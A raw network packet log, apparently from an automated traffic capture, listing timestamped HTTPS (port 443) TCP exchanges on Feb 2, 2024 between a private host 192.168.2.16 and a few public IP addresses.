                                                                                                                          Feb 2, 2024 20:17:51.241058111 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.241116047 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.241364002 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.241384029 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.296701908 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.296744108 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.296927929 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.297127008 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.297143936 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.475172043 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.475492001 CET49772443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.475523949 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.476015091 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.476298094 CET49772443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.476366043 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.476454020 CET49772443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.513808966 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.516688108 CET49771443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.516722918 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.517309904 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.517642021 CET49771443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.517735004 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.517817974 CET49771443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.521905899 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.529210091 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.531869888 CET49773443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.531929970 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.532262087 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.532566071 CET49773443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.532636881 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.532708883 CET49773443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.553734064 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.553965092 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.553977013 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.554677010 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.554936886 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.555049896 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.555063963 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.561913967 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.565120935 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.565346003 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.565362930 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.566375017 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.566623926 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.566705942 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.566731930 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.566736937 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.566919088 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.566937923 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.567234039 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.567462921 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.567523003 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.567534924 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.573940992 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.597942114 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.603439093 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.609905005 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.609946012 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.619450092 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.619467974 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.716805935 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.716864109 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.716914892 CET49771443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.716943026 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.716959000 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.717010975 CET49771443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.718214035 CET49771443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.718234062 CET44349771152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.737282991 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.737343073 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.737420082 CET49773443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.737426043 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.737505913 CET49773443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.738346100 CET49773443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.738384008 CET44349773152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.763771057 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.763917923 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.763983965 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.764018059 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.764065027 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.764132977 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.764983892 CET49775443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.765002966 CET44349775152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.769157887 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.769232035 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.769321918 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.769634008 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.769656897 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.773781061 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.773926020 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.773988962 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.774007082 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.774055004 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.774070024 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.774144888 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.774514914 CET49774443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.774529934 CET44349774152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.779053926 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.779087067 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.779153109 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.779350996 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:51.779360056 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.862055063 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.862164974 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.862212896 CET49772443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.862241030 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.862268925 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.862310886 CET49772443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.868791103 CET49772443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:51.868813038 CET44349772104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.870002031 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:51.870089054 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:51.870191097 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:51.870419979 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:51.870459080 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.057352066 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.057477951 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.057651043 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.057670116 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.057746887 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.057801962 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.058420897 CET49776443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.058437109 CET44349776104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.091129065 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.091428995 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.091460943 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.092778921 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.093014956 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.093091965 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.093105078 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.093396902 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.093408108 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.093622923 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.093703032 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.093750000 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.093818903 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.093909025 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.124017954 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.124407053 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.124423027 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.124845982 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.125128984 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.125272989 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.125293970 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.125376940 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.137902021 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.141902924 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.177530050 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.295180082 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.295303106 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.295376062 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.295414925 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.295519114 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.295603037 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.295815945 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.295954943 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.296021938 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.296055079 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.296103001 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.296211004 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.296263933 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.296307087 CET49777443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.296335936 CET44349777152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.297533035 CET49778443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.297559023 CET44349778152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.571788073 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572084904 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572191954 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572199106 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.572266102 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572330952 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.572349072 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572459936 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572516918 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.572530031 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572640896 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572699070 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.572711945 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572889090 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.572957993 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.572971106 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.573065042 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.573118925 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.573132038 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597237110 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597326994 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597404003 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597440004 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.597508907 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597548008 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.597697020 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597757101 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.597773075 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597871065 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.597923994 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.597939014 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.598398924 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.598459959 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.598473072 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.598586082 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.598643064 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.598659039 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.599198103 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.599255085 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.599267006 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.599395037 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.599448919 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.599461079 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.599925995 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.599978924 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.599992037 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.600112915 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.600167990 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.600179911 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.600264072 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.600321054 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.600332975 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.600519896 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.600578070 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.613310099 CET49779443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.613327980 CET44349779172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.615859985 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.615931988 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.616013050 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.630351067 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.630383015 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.636603117 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.636672020 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.636754990 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.636982918 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.637016058 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.637738943 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.637768030 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.637825012 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.638037920 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.638053894 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.693748951 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.693809986 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.693917990 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.694147110 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.694179058 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.901470900 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.905658960 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.908895016 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.908921957 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.909027100 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.909040928 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.909347057 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.909401894 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.909729004 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.909801006 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.910072088 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.910134077 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.910274982 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.910310984 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.910422087 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:52.910460949 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.956396103 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.958302021 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.959899902 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.959930897 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.960040092 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.960055113 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.960436106 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.960525990 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.960767984 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:52.960860968 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.960975885 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:52.961071968 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:52.961143017 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.005906105 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.013452053 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:17:53.273540020 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.273936033 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.274019003 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:53.274960041 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.275032043 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.275084019 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:53.277919054 CET49782443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:53.277935982 CET44349782172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.278397083 CET49781443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:17:53.278429985 CET44349781172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.398350954 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.398395061 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.398515940 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.398545027 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.398611069 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.499371052 CET49783443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.499433041 CET44349783104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.911334991 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.911395073 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:53.911536932 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.911848068 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:53.911860943 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.164133072 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.209531069 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.245218992 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.245244980 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.246702909 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.247153997 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.247329950 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.247343063 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.289477110 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.289520979 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.618017912 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.618153095 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.618221998 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.618257046 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.618509054 CET44349785104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.618577003 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.624118090 CET49785443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:17:54.624150991 CET44349785104.21.85.189192.168.2.16
